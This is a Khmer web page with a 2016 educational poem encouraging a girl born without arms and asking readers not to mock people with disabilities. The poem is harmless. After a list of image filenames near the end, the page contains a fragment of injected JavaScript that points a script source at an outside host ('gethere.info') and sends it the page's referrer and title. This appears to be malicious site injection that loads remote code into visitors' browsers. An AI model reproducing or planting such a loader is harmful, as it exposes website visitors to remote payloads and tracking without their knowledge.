ព្រឹតិ្តការណ៍ថ្មីៗ

សួនកំណាព្យអប់រំ «កុំសើចខ្ញុំអី!» (បទបន្ទោលកាក)

3 ឆ្នាំ មុន 362 តូ សុផល

(ទម្រង់បទៈជុចនិងត្រី) (រូបភាពៈ ប្អូនស្រី សាត ស្រីប៉ុច ពិកាដៃទាំងពីរពីកំណើត) ១.ឱ!ព្រហ្មលិខិត ម្តេចចិត្តអ្នកឥតមេត្តា ឲ្យខ្ញុំពិកា អត់មានហត្ថាដូចគេ។

២.កើតមកមិនគាប់ ជីវិតអភ័ព្វម្ល៉េះទេ ចិត្តស៊ូមិនរេ ដើម្បីពុកម៉ែតាយាយ។

៣.តស៊ូជំនះ ពុះពារឧបសគ្គទាំងឡាយ ចិត្តមិនរាយមាយ ទោះជារូបកាយមិនល្អ។

៤.ទោះខ្ញុំពិកា តែខំសិក្សាបន្ត នព្វន្តអក្សរ ប្រឹងគ្មានឈប់ឈររាល់ថ្ងៃ។

៥.តាំងចិត្តមោះមុត តស៊ូអត់ធ្មត់លកលៃ ហ្វឹកហាត់កែច្នៃ ជើងជំនួសដៃធ្វើការ។

៦.ពុកម៉ែត្រេកអរ ញាតិមិត្រសាទរផងណា សរសើរខ្ញុំថា ក្មេងស្រីអស្ចារ្យពេកក្រៃ។

៧.ហ្វឹកហាត់លត់ដំ តស៊ូខិតខំរាល់ថ្ងៃ ទោះពិកាដៃ ប្តេជ្ញាឃ្មាតខ្មីសិក្សា។

៨.កុំសើចពែបជ្រាយ មាក់ងាយដល់រូបខ្ញុំណា រៀនសូត្រធ្វើការ ព្យាយាមឧស្សាហ៍រាល់ថ្ងៃ។

៩.បើមានគំនិត ពិតមានកំណើតថ្លាថ្លៃ បានជោគបានជ័យ កេរ្តិ៍ឈ្មោះយសល្បីគ្រួសារ។

១០.សូមកុំឆ្មៃឆ្មើង មាក់ងាយរើសអើងខ្ញុំណា សូមក្តីមេត្តា សន្តោសករុណាប្រណី។

១១.សព្វសត្វម្នឹះលោក កើតមកពួនជ្រកលោកីយ៍ ក្មេងចាស់ប្រុសស្រី ចង់ល្អប្រពៃដូចគេ។

១១.ឃ្លោងឃ្លាពាក្យកាព្យ ចងជាកំណាព្យរិះរេ រិះគិតគ្នាន់គ្នេរ ចងក្រងសរសេរកែច្នៃ។

១២.គ្រាន់បានរិះគិត ចែកជូនញាតិមិត្រប្រុសស្រី បានក្សាន្តដួងចៃ ចៅស្មេររង្សីចងចារ។

១៣.វន្ទាបង្គំ ចាប់ផ្គុំប្រណមហត្ថា ក្រាបឱនសិរសា ពុកម៉ែផងណាប្រពៃ។

១៤.លើសលស់ឆ្គងខុស ភ្លាំងភ្លាត់ចន្លោះម្តេចក្តី សូមអធ្យាស្រ័យ កុំចាប់ទោសពៃរ៍ខ្ញុំណា។

១៥.អាយុ វណ្ណៈ សុខៈ ពលៈថ្លៃថ្លា ពរបួនប្រការ ជូនញាតិខេមរាប្រុសស្រី។

តែងកំណាព្យលើកទឹកចិត្តប្អូនស្រីពិកាដៃសងខាងពីកំណើត ដែលមានឈ្មោះថា សាត ស្រីប៉ុច នៅភូមិភ្នំតូច ឃុំភ្នំតូច ស្រុកមង្គលបុរី ខេត្តបាត់ដំបង។ សង្ឃឹមថា នឹងមានប្រិយមិត្រជួយអាន និងស៊ែចែករំលែកបន្តផងចុះបាទ!

ចប់ និពន្ធ និងរក្សាសិទ្ធិដោយៈ លោក ដួង អរុណរង្សី (១១.សីហា.២០១៦) រាជធានីភ្នំពេញ។

13956859_587043504800694_1950414553_n 13957541_587043508134027_515220795_n 13962501_594376877413369_7375274439685860124_n 14009801_587043438134034_1949671086_n 14011849_587043464800698_872439577_n 14017688_587043388134039_1533090070_ns.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

បន្ថែមយោបល់របស់អ្នក

យោបល់

 

 

ព័ត៌មានពាក់ព័ន្ធ